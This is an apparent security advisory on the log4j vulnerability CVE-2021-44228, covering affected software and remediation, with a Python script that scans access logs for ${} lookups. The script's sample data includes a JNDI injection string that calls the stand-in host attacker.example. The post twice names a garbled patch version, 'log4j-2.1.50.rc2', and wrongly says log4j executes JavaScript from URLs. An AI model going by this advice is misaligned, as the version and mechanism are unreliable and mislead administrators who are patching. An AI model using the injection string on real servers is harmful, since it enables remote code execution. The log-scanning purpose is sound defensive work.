This is a vulnerability being actively exploited in the wild, affecting servers and clients that run Java and the log4j framework. It is a critical vulnerability in the Java logging package log4j, which is used in a significant amount of software, including Apache, Apple iCloud, Steam, Minecraft and others.
If your organisation uses the log4j library, you should upgrade to log4j-2.1.50.rc2 immediately. Also make sure that your Java installation is up to date; however, note that this is not an across-the-board solution, because you may need to wait until your vendors push security updates out for their affected products.
What is Impacted?
Millions of applications and manufacturers use log4j for logging. Affected systems include:
- Servers and clients that run Java and log anything using the log4j framework
- log4j 2.x confirmed, and probably log4j 1.x also
- Don’t forget appliances that use Java server components
- Downstream projects that include log4j, including Apache Struts, Solr, etc.
This community resource contains a list of software and components that have been found vulnerable and impacted.
What Should I Do?
If your organization uses the log4j library, upgrade to log4j-2.1.50.rc2 immediately. You should also be sure that your Java instance is up-to-date.
A patch for CVE-2021-44228 has been released, but unfortunately, we’re at the mercy of many of our vendors to push updates that completely patch the vulnerability.
Exploit Summary
Log4j takes a log message, interprets content embedded in it as a URL, and goes out and fetches it. It will even execute JavaScript in URLs with the full privileges of the main program. Exploits are triggered inside log messages using the ${} syntax.
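Because the trigger is the ${} lookup syntax inside attacker-controlled text that gets logged, one practical detection step is to scan existing logs (web access logs, application logs) for that syntax. The following is an added example, not code from the original post or from the log4j project: it classifies constructed sample access-log lines by whether they contain a lookup, and treats the jndi lookup type (the one behind CVE-2021-44228) as critical. The sample lines, the "attacker.example" host and the severity labels are constructed for illustration.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines (not real traffic). The last quoted field
# is the client-supplied User-Agent, a value that commonly ends up in a log4j
# log message verbatim.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 200 13 "-" "${sys:user.home}"',
]

# A log4j lookup is written as ${type:argument}; capture the lookup type.
LOOKUP_RE = re.compile(r"\$\{\s*([A-Za-z0-9_]+)\s*:")

# Lookup types that make log4j reach out over the network to fetch content.
NETWORK_LOOKUPS = {"jndi"}


def find_lookups(line: str) -> List[str]:
    """Return the lookup types (e.g. 'jndi', 'sys') that appear in one log line."""
    return [m.group(1).lower() for m in LOOKUP_RE.finditer(line)]


def classify_line(line: str) -> str:
    """Classify a log line as 'clean', 'suspicious' or 'critical'."""
    if "${" not in line:
        return "clean"
    if set(find_lookups(line)) & NETWORK_LOOKUPS:
        return "critical"
    # Any ${...} in client-supplied data is abnormal. This branch also catches
    # nested lookups that hide the type from the simple regex above, so the
    # scanner does not depend on spotting the literal word "jndi".
    return "suspicious"


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Pair every line with its classification, for review or alerting."""
    return [(classify_line(line), line) for line in lines]


if __name__ == "__main__":
    for verdict, line in scan(SAMPLE_LOG_LINES):
        print(f"{verdict:10s} {line}")
```

Run it over real access logs from the period before patching; "critical" hits indicate attempts to trigger the network lookup and the affected hosts should be reviewed for follow-on activity.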